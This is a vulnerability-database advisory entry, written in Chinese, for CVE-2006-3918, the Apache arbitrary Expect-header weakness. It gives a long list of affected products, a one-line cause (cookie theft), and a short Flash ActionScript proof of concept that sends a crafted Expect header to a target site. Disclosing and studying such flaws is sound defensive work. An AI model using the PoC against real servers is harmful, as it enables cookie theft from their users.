Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness

基本字段

漏洞编号：: SSV-81994

披露/发现时间：: 2006-07-27

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2006-3918

CNNVD-ID：: CNNVD-200607-476

CNVD-ID：: CNVD-2006-5764

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 0x153 共获得 0.15KB

## 漏洞类型：设计缺陷 ## 受影响的组件 ``` VMWare ESX Server 3.0 VMWare ESX Server 2.5.4 Patch 1 VMWare ESX Server 2.5.4 VMWare ESX Server 2.5.3 Patch 4 VMWare ESX Server 2.5.3 VMWare ESX Server 2.5.2 VMWare ESX Server 2.5 VMWare ESX Server 2.1.3 Patch 2 VMWare ESX Server 2.1.3 VMWare ESX Server 2.1.2 VMWare ESX Server 2.1.1 VMWare ESX Server 2.1 VMWare ESX Server 2.0.2 Patch 2 VMWare ESX Server 2.0.2 VMWare ESX Server 2.0.1 build 6403 VMWare ESX Server 2.0.1 VMWare ESX Server 2.0 build 5257 VMWare ESX Server 2.0 VMWare ESX Server 2.5.3 Patch 2 VMWare ESX Server 2.5.2 Patch 4 VMWare ESX Server 2.1.3 Patch 1 VMWare ESX Server 2.0.2 Patch 1 Ubuntu Ubuntu Linux 7.10 sparc Ubuntu Ubuntu Linux 7.10 powerpc Ubuntu Ubuntu Linux 7.10 i386 Ubuntu Ubuntu Linux 7.10 amd64 Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu Linux 6.10 powerpc Ubuntu Ubuntu Linux 6.10 i386 Ubuntu Ubuntu Linux 6.10 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 Turbolinux Turbolinux Server 10.0 x86 Turbolinux Turbolinux Server 10.0 Turbolinux Turbolinux Server 8.0 Turbolinux Turbolinux Server 7.0 Turbolinux Turbolinux Desktop 10.0 Turbolinux Turbolinux FUJI Turbolinux Turbolinux 10 F... TurboLinux Personal TurboLinux Multimedia Turbolinux Home Turbolinux Appliance Server Workgroup Edition 1.0 Turbolinux Appliance Server Hosting Edition 1.0 Turbolinux Appliance Server 1.0 Workgroup Edition Turbolinux Appliance Server 1.0 Hosting Edition Turbolinux Appliance Server 2.0 SuSE SUSE Linux Enterprise Server 9 SuSE SUSE Linux Enterprise Server 10 SP1 SuSE SUSE Linux Enterprise SDK 10.SP1 SuSE openSUSE 10.3 S.u.S.E. tomboy 10.0 S.u.S.E. openSUSE 10.2 S.u.S.E. Open-Enterprise-Server 0 S.u.S.E. Novell Linux POS 9 S.u.S.E. Novell Linux Desktop SDK 9.0 S.u.S.E. Novell Linux Desktop 9.0 S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Professional 9.2 x86_64 S.u.S.E. Linux Professional 9.2 S.u.S.E. Linux Personal 9.3 x86_64 S.u.S.E. Linux Personal 9.3 S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux 10.1 x86-64 S.u.S.E. Linux 10.1 x86 S.u.S.E. Linux 10.1 ppc RedHat Stronghold for Enterprise Linux 0 RedHat Enterprise Linux WS 4 RedHat Enterprise Linux WS 3 RedHat Enterprise Linux WS 2.1 IA64 RedHat Enterprise Linux WS 2.1 RedHat Enterprise Linux ES 4 RedHat Enterprise Linux ES 3 RedHat Enterprise Linux ES 2.1 IA64 RedHat Enterprise Linux ES 2.1 RedHat Certificate Server 7.3 RedHat Advanced Workstation for the Itanium Processor 2.1 Red Hat Enterprise Linux AS 4 Red Hat Enterprise Linux AS 3 Red Hat Enterprise Linux AS 2.1 IA64 Red Hat Enterprise Linux AS 2.1 Oracle Application Server 10g 9.0.4 .3 Oracle Application Server 10g 9.0.4 .2 Oracle Application Server 10g 9.0.4 .1 Oracle Application Server 10g 9.0.4 OpenBSD OpenBSD 3.9 OpenBSD OpenBSD 3.8 IBM HTTP Server 2.0.47 .1 IBM HTTP Server 2.0.47 IBM HTTP Server 2.0.42 .2 IBM HTTP Server 2.0.42 .1 IBM HTTP Server 2.0.42 IBM HTTP Server 1.3.28 .1 IBM HTTP Server 1.3.28 IBM HTTP Server 1.3.26 .2 IBM HTTP Server 1.3.26 .1 IBM HTTP Server 1.3.26 IBM HTTP Server 1.3.19 .5 IBM HTTP Server 1.3.19 .4 IBM HTTP Server 1.3.19 .3 IBM HTTP Server 1.3.19 .2 IBM HTTP Server 1.3.19 .1 IBM HTTP Server 1.3.19 IBM HTTP Server 1.3.12 .7 IBM HTTP Server 1.3.12 .6 IBM HTTP Server 1.3.12 .5 IBM HTTP Server 1.3.12 .4 - IBM AIX 4.3.3 - IBM AIX 5.1 - RedHat Linux 7.1 - S.u.S.E. Linux 7.2 IBM HTTP Server 1.3.12 .3 - HP HP-UX 11.0 - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Sun Solaris 8_sparc - Sun Solaris 7.0 - Sun Solaris 2.6 IBM HTTP Server 1.3.12 .2 IBM HTTP Server 1.3.12 .1 IBM HTTP Server 1.3.12 IBM HTTP Server 6.1.0 IBM HTTP Server 6.0.2.12 IBM HTTP Server 2.2.1 IBM Hardware Management Console (HMC) for pSeries 6.0 R1.0 IBM Hardware Management Console (HMC) for iSeries 6.0 R1.0 HP OpenVMS Secure Web Server 1.2 HP OpenVMS Secure Web Server 1.1 -1 HP OpenVMS Secure Web Server 2.1-1 HP HP-UX B.11.31 HP HP-UX B.11.31 HP HP-UX B.11.23 HP HP-UX B.11.11 HP HP-UX B.11.11 F-Secure Policy Manager Server 8.11 F-Secure Policy Manager Server 8.10 F-Secure Policy Manager Server 8.00 Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k Debian Linux 3.1 ia-64 Debian Linux 3.1 ia-32 Debian Linux 3.1 hppa Debian Linux 3.1 arm Debian Linux 3.1 amd64 Debian Linux 3.1 alpha Debian Linux 3.1 Avaya Messaging Storage Server MM3.0 Avaya Messaging Storage Server 2.0 Avaya Messaging Storage Server 1.0 Avaya Messaging Storage Server Avaya Message Networking Avaya Intuity LX Avaya Interactive Response 1.3 Avaya Interactive Response 1.2.1 Avaya Interactive Response 2.0 Avaya Interactive Response Avaya Integrated Management 2.1 Avaya Integrated Management Avaya CVLAN Apache Software Foundation Apache 2.0.57 Apache Software Foundation Apache 1.3.34 Apache Software Foundation Apache 2.2.1 ``` ## 漏洞成因： Apache 请求头存在安全缺陷，导致攻击者可以获取用户cookie，并进行攻击 ## poc: ``` var req:LoadVars=new LoadVars(); req.addRequestHeader("Expect", ""); req.send("http://www.target.site/","_blank","GET"); ``` ## 参考： http://www.securityfocus.com/bid/19661/info